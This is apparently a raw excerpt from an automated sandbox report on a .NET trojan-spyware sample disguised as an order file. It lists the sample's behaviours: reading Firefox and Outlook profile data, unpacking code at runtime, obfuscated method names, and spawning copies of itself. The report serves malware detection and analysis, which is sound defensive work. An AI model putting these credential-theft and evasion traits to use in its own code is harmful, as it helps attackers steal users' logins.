Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, fHXvykMgXmg0e7ArtG.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, fHXvykMgXmg0e7ArtG.cs	Security API names: _0020.AddAccessRule
Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, b8twtfyFxeIQtw5F0G.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, b8twtfyFxeIQtw5F0G.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, fHXvykMgXmg0e7ArtG.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, fHXvykMgXmg0e7ArtG.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, fHXvykMgXmg0e7ArtG.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/1@1/1

Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NEW ORDER 98540-0.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe

Mutant created: NULL

Source: NEW ORDER 98540-0.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: NEW ORDER 98540-0.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: NEW ORDER 98540-0.exe

ReversingLabs: Detection: 34%

Source: unknown	Process created: C:\Users\user\Desktop\NEW ORDER 98540-0.exe C:\Users\user\Desktop\NEW ORDER 98540-0.exe
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process created: C:\Users\user\Desktop\NEW ORDER 98540-0.exe C:\Users\user\Desktop\NEW ORDER 98540-0.exe
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process created: C:\Users\user\Desktop\NEW ORDER 98540-0.exe C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Jump to behavior

Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: NEW ORDER 98540-0.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: NEW ORDER 98540-0.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

Source: NEW ORDER 98540-0.exe, --.cs	.Net Code: _0008 System.AppDomain.Load(byte[])
Source: NEW ORDER 98540-0.exe, --.cs	.Net Code: _0008 contains xor as well as GetObject
Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, fHXvykMgXmg0e7ArtG.cs	.Net Code: GSrT2SV88c System.Reflection.Assembly.Load(byte[])
Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, fHXvykMgXmg0e7ArtG.cs	.Net Code: GSrT2SV88c System.Reflection.Assembly.Load(byte[])

Source: NEW ORDER 98540-0.exe

Static PE information: section name: .text entropy: 7.9521127631868005

Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, MpXysIaBDSPVFB0yTd.cs	High entropy of concatenated method names: 'uHnhsoyUZI', 'sNWhGOtDAL', 'yf1hvJ1GHI', 'fsFhrbvjJW', 'CbDhkAW1fW', 'lrqhpshUKk', 'KnrhMB8uXk', 'GpMhly5Cag', 'M0LhSwfIUw', 'g4Ch1aM2Vo'
Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, lnblCeeykDavJbFESN.cs	High entropy of concatenated method names: 'vOvpsfILiN', 'Vc5pv3Zqvd', 'gIJpkm9ODd', 'axFkb5yJDU', 'nk0kzVB5X6', 'NX5pHWNtIm', 'o6spAD3ZGG', 'ynWpUdYWD8', 'vGfpq4W3wr', 'fe6pT7nFZP'
Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, mQGffPbFAA8IEcj98t.cs	High entropy of concatenated method names: 'CHXEATO6Xm', 'zu9EqpHNKU', 'X6SETmy5VD', 'kjIEsiOpsY', 'WKoEGh60eA', 'e8AErrrNci', 'coMEkO0E2L', 'jDAhxYr3UU', 'dbDha5uPHa', 'HjVhC9OtVR'
Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, HVHn2g3Q4LfsM7dyVK.cs	High entropy of concatenated method names: 'YyatSnHGd2', 'Q7Rt1mjJkl', 'ToString', 'YHJts0veGB', 'KuAtG8m2Au', 'hF5tv5T3WV', 'YYvtrfPCyb', 'DbXtkGOwST', 'kottp3ehFQ', 'ILbtMnS1Ko'
Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, UYdeq7CoZY7D8MKIGo.cs	High entropy of concatenated method names: 'qXnhBGyte8', 'vFWh5mRYxO', 'QyRhgYcsxx', 'gAIh9M2MVn', 'xOPhwQDFbp', 'X9LhQFxEFG', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, r4D6nA4ylfJKbPA8Hx.cs	High entropy of concatenated method names: 'HM2pPj4KIA', 'QelpmKVSJR', 'CXqp2MpqsM', 'iAOpIllM9Q', 'tCXp0tM9VK', 'ATWp82ITsS', 'v3XpjxjbKv', 'UGXpyP0Btb', 'lK2pJnJ6nv', 'mWUpXUXC0v'
Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, XLNrvkGXXVcIvSsY94.cs	High entropy of concatenated method names: 'Dispose', 'ewkACqArxA', 'PNdU5ZMoTN', 'Mk8YYQCwrs', 'r4pAbXysIB', 'nSPAzVFB0y', 'ProcessDialogKey', 'dduUHYdeq7', 'oZYUA7D8MK', 'AGoUU1QGff'
Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, wLIAKIAH7d9yDyNmdO3.cs	High entropy of concatenated method names: 'gviEPnU80e', 'FVjEmOXdk3', 'QYlE2micL1', 'NXlEI49LKM', 'fXSE0r1oc0', 'I82E8sV1oe', 'G1kEjx6WmB', 'E6bEy1vQBI', 'lfvEJ7xQht', 'SrLEXUFQ2C'
Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, uZlOL9TLYmU5CQWggV.cs	High entropy of concatenated method names: 'ucUAp8twtf', 'QxeAMIQtw5', 'xjBASYsGvi', 'x51A1GShLv', 'Vy5AowkZGo', 'm3aAOOruWk', 'fp9iGhwijMs7COukQq', 'Epg9EZB9DDomvBbAil', 'j5JAAib0tc', 'B1SAqHGTh9'
Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, b8twtfyFxeIQtw5F0G.cs	High entropy of concatenated method names: 'IqbGw6dbgA', 'aGmGLdXeGy', 'YjDGVL1tgE', 'UYcG3XWX4x', 'DbIGuOD2LN', 'X6GGndeUui', 'WZxGxpvxHs', 'i4MGa6FDMs', 'NrmGCPWUqE', 'bJdGblQlCB'
Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, HCIZegUnFlju9F3i60.cs	High entropy of concatenated method names: 'eOj2Om7JU', 'AF4ItOeY1', 'HyZ8PqOYP', 'XJbjuFcWh', 'PKJJBnMy0', 'fO7XRpwM5', 'ADrPjUZHfL79Dpc7R0', 'xRnsK71ppjC6SNaQlN', 'AZ7hNEwyg', 'tyiRTVHgN'
Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, NL0FkmAqDomhZHob5QI.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KiuRw1kZqD', 'r2ZRLeRPgQ', 'r7WRVxYbRh', 'jdKR3cqNM4', 'WObRu0woYQ', 'oX3RncB1jE', 'gp1RxL6HY0'
Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, L06p97JjBYsGviP51G.cs	High entropy of concatenated method names: 'CSCvITw9MF', 'f6sv8kt23a', 'wY7vy44eOi', 'P3CvJOhVro', 'pbnvoT0Ehp', 'NyMvOi0VTd', 'VlivtEFTET', 'JhtvhslbC4', 'zmUvEGj4in', 'LxLvRbRQEJ'
Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, fHXvykMgXmg0e7ArtG.cs	High entropy of concatenated method names: 'G0aqiFIZZe', 'tUGqsPObsv', 'OAiqGtvUAs', 'AI7qvbsc94', 'VvVqr6hZFW', 'Hvhqkq0j5k', 'ew2qprpEkx', 'wIuqMDsKJn', 'FN9qlyq73c', 'kT8qSxbJ7t'
Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, bfJrT0FFvJIbmSerca.cs	High entropy of concatenated method names: 'gIQDylRnNs', 'oKVDJ5uYmn', 'L6dDBFxDmn', 'dWwD52DTQv', 'uWUD9j0J5H', 'PSrDQnS8vE', 'U5NDe6o9WD', 'TqjDND0371', 'FRsDfR6ecO', 'DvjDWJ5kdu'
Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, L44r0f5UsYFLUKxgXK.cs	High entropy of concatenated method names: 'IRVsWJ5U97pd92mNq0d', 'nYEDxm5f64SLLjgBvH8', 'gOwkhmKZO2', 'I50kE51Eck', 'LBfkRqqggx', 'W0NFea56ELXIQBSplJQ', 'tPc8Qa5q9cfS0egVXWj', 'OAhntG5vGrrviNNTJsd'
Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, mhLvAJXlOjXsFxy5wk.cs	High entropy of concatenated method names: 'qkur0a7qN9', 'aDgrjtNofP', 'i07vg9U1Tq', 'NSGv9TNAK9', 'tcLvQB1D02', 'l01vKJiobv', 'x3IveQ4Cl0', 'qmqvNUxg3r', 'HROv4SyTOS', 'hmZvf1X1WM'
Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, TdcdN7Vi89EF5K6Q2j.cs	High entropy of concatenated method names: 'ToString', 'pSFOWSpF8g', 'gyVO51D53r', 'HZrOgZkoXj', 'vagO9YYAx0', 'RybOQFnDT9', 'CuMOKqFMlR', 'p9jOegIex0', 'O1aONbUOOk', 'uyqO40vL1v'
Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, e3rC94nD6GJjOouD8Y.cs	High entropy of concatenated method names: 'BW3tayfXBU', 't5YtbVDBdu', 'poqhHln7vZ', 'uC3hAqsoTS', 'IUotWPPAKu', 'RL5tdxSvDZ', 'eRJtFHh1Qn', 'dIdtw38mgV', 'hp4tLxg28D', 'tY1tV73008'
Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, i9x7YJvmZq74sAn79s.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'SWPUCRNnX6', 'FH2UbTkfos', 'cPWUz6Xtvd', 'I5aqH8p3xt', 'gIBqAsyOFR', 'CiYqUQxOhN', 'InvqqSb85R', 'AKyP72LDCR3cyE6qdSq'
Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, a4TpKUw4fdYmZyjBY2.cs	High entropy of concatenated method names: 'FUBofQ2rmf', 'FslodW4OJJ', 'FOKowdQg2x', 'vWqoLxbPkQ', 'Kpco51RUXN', 'VKHogu3b1T', 'GuBo9LLWsb', 'd19oQVG6mn', 'SlsoKyyrIn', 'TqBoeIZjnq'
Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, wGo13aBOruWkEkDsnU.cs	High entropy of concatenated method names: 'ssYkivua5o', 'XmWkGCZc7D', 'TRhkr2TSaB', 'sBDkp9gEqC', 'NvpkMxGKEy', 'kKOruriKHG', 'aRDrnOF1hq', 'arqrxu8JhC', 'oRcraQbYKo', 'ITQrCFFkhu'
Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, MpXysIaBDSPVFB0yTd.cs	High entropy of concatenated method names: 'uHnhsoyUZI', 'sNWhGOtDAL', 'yf1hvJ1GHI', 'fsFhrbvjJW', 'CbDhkAW1fW', 'lrqhpshUKk', 'KnrhMB8uXk', 'GpMhly5Cag', 'M0LhSwfIUw', 'g4Ch1aM2Vo'
Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, lnblCeeykDavJbFESN.cs	High entropy of concatenated method names: 'vOvpsfILiN', 'Vc5pv3Zqvd', 'gIJpkm9ODd', 'axFkb5yJDU', 'nk0kzVB5X6', 'NX5pHWNtIm', 'o6spAD3ZGG', 'ynWpUdYWD8', 'vGfpq4W3wr', 'fe6pT7nFZP'
Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, mQGffPbFAA8IEcj98t.cs	High entropy of concatenated method names: 'CHXEATO6Xm', 'zu9EqpHNKU', 'X6SETmy5VD', 'kjIEsiOpsY', 'WKoEGh60eA', 'e8AErrrNci', 'coMEkO0E2L', 'jDAhxYr3UU', 'dbDha5uPHa', 'HjVhC9OtVR'
Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, HVHn2g3Q4LfsM7dyVK.cs	High entropy of concatenated method names: 'YyatSnHGd2', 'Q7Rt1mjJkl', 'ToString', 'YHJts0veGB', 'KuAtG8m2Au', 'hF5tv5T3WV', 'YYvtrfPCyb', 'DbXtkGOwST', 'kottp3ehFQ', 'ILbtMnS1Ko'
Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, UYdeq7CoZY7D8MKIGo.cs	High entropy of concatenated method names: 'qXnhBGyte8', 'vFWh5mRYxO', 'QyRhgYcsxx', 'gAIh9M2MVn', 'xOPhwQDFbp', 'X9LhQFxEFG', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, r4D6nA4ylfJKbPA8Hx.cs	High entropy of concatenated method names: 'HM2pPj4KIA', 'QelpmKVSJR', 'CXqp2MpqsM', 'iAOpIllM9Q', 'tCXp0tM9VK', 'ATWp82ITsS', 'v3XpjxjbKv', 'UGXpyP0Btb', 'lK2pJnJ6nv', 'mWUpXUXC0v'
Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, XLNrvkGXXVcIvSsY94.cs	High entropy of concatenated method names: 'Dispose', 'ewkACqArxA', 'PNdU5ZMoTN', 'Mk8YYQCwrs', 'r4pAbXysIB', 'nSPAzVFB0y', 'ProcessDialogKey', 'dduUHYdeq7', 'oZYUA7D8MK', 'AGoUU1QGff'
Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, wLIAKIAH7d9yDyNmdO3.cs	High entropy of concatenated method names: 'gviEPnU80e', 'FVjEmOXdk3', 'QYlE2micL1', 'NXlEI49LKM', 'fXSE0r1oc0', 'I82E8sV1oe', 'G1kEjx6WmB', 'E6bEy1vQBI', 'lfvEJ7xQht', 'SrLEXUFQ2C'
Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, uZlOL9TLYmU5CQWggV.cs	High entropy of concatenated method names: 'ucUAp8twtf', 'QxeAMIQtw5', 'xjBASYsGvi', 'x51A1GShLv', 'Vy5AowkZGo', 'm3aAOOruWk', 'fp9iGhwijMs7COukQq', 'Epg9EZB9DDomvBbAil', 'j5JAAib0tc', 'B1SAqHGTh9'
Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, b8twtfyFxeIQtw5F0G.cs	High entropy of concatenated method names: 'IqbGw6dbgA', 'aGmGLdXeGy', 'YjDGVL1tgE', 'UYcG3XWX4x', 'DbIGuOD2LN', 'X6GGndeUui', 'WZxGxpvxHs', 'i4MGa6FDMs', 'NrmGCPWUqE', 'bJdGblQlCB'
Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, HCIZegUnFlju9F3i60.cs	High entropy of concatenated method names: 'eOj2Om7JU', 'AF4ItOeY1', 'HyZ8PqOYP', 'XJbjuFcWh', 'PKJJBnMy0', 'fO7XRpwM5', 'ADrPjUZHfL79Dpc7R0', 'xRnsK71ppjC6SNaQlN', 'AZ7hNEwyg', 'tyiRTVHgN'
Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, NL0FkmAqDomhZHob5QI.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KiuRw1kZqD', 'r2ZRLeRPgQ', 'r7WRVxYbRh', 'jdKR3cqNM4', 'WObRu0woYQ', 'oX3RncB1jE', 'gp1RxL6HY0'
Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, L06p97JjBYsGviP51G.cs	High entropy of concatenated method names: 'CSCvITw9MF', 'f6sv8kt23a', 'wY7vy44eOi', 'P3CvJOhVro', 'pbnvoT0Ehp', 'NyMvOi0VTd', 'VlivtEFTET', 'JhtvhslbC4', 'zmUvEGj4in', 'LxLvRbRQEJ'
Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, fHXvykMgXmg0e7ArtG.cs	High entropy of concatenated method names: 'G0aqiFIZZe', 'tUGqsPObsv', 'OAiqGtvUAs', 'AI7qvbsc94', 'VvVqr6hZFW', 'Hvhqkq0j5k', 'ew2qprpEkx', 'wIuqMDsKJn', 'FN9qlyq73c', 'kT8qSxbJ7t'
Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, bfJrT0FFvJIbmSerca.cs	High entropy of concatenated method names: 'gIQDylRnNs', 'oKVDJ5uYmn', 'L6dDBFxDmn', 'dWwD52DTQv', 'uWUD9j0J5H', 'PSrDQnS8vE', 'U5NDe6o9WD', 'TqjDND0371', 'FRsDfR6ecO', 'DvjDWJ5kdu'
Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, L44r0f5UsYFLUKxgXK.cs	High entropy of concatenated method names: 'IRVsWJ5U97pd92mNq0d', 'nYEDxm5f64SLLjgBvH8', 'gOwkhmKZO2', 'I50kE51Eck', 'LBfkRqqggx', 'W0NFea56ELXIQBSplJQ', 'tPc8Qa5q9cfS0egVXWj', 'OAhntG5vGrrviNNTJsd'
Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, mhLvAJXlOjXsFxy5wk.cs	High entropy of concatenated method names: 'qkur0a7qN9', 'aDgrjtNofP', 'i07vg9U1Tq', 'NSGv9TNAK9', 'tcLvQB1D02', 'l01vKJiobv', 'x3IveQ4Cl0', 'qmqvNUxg3r', 'HROv4SyTOS', 'hmZvf1X1WM'
Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, TdcdN7Vi89EF5K6Q2j.cs	High entropy of concatenated method names: 'ToString', 'pSFOWSpF8g', 'gyVO51D53r', 'HZrOgZkoXj', 'vagO9YYAx0', 'RybOQFnDT9', 'CuMOKqFMlR', 'p9jOegIex0', 'O1aONbUOOk', 'uyqO40vL1v'
Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, e3rC94nD6GJjOouD8Y.cs	High entropy of concatenated method names: 'BW3tayfXBU', 't5YtbVDBdu', 'poqhHln7vZ', 'uC3hAqsoTS', 'IUotWPPAKu', 'RL5tdxSvDZ', 'eRJtFHh1Qn', 'dIdtw38mgV', 'hp4tLxg28D', 'tY1tV73008'
Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, i9x7YJvmZq74sAn79s.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'SWPUCRNnX6', 'FH2UbTkfos', 'cPWUz6Xtvd', 'I5aqH8p3xt', 'gIBqAsyOFR', 'CiYqUQxOhN', 'InvqqSb85R', 'AKyP72LDCR3cyE6qdSq'
Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, a4TpKUw4fdYmZyjBY2.cs	High entropy of concatenated method names: 'FUBofQ2rmf', 'FslodW4OJJ', 'FOKowdQg2x', 'vWqoLxbPkQ', 'Kpco51RUXN', 'VKHogu3b1T', 'GuBo9LLWsb', 'd19oQVG6mn', 'SlsoKyyrIn', 'TqBoeIZjnq'
Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, wGo13aBOruWkEkDsnU.cs	High entropy of concatenated method names: 'ssYkivua5o', 'XmWkGCZc7D', 'TRhkr2TSaB', 'sBDkp9gEqC', 'NvpkMxGKEy', 'kKOruriKHG', 'aRDrnOF1hq', 'arqrxu8JhC', 'oRcraQbYKo', 'ITQrCFFkhu'

Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
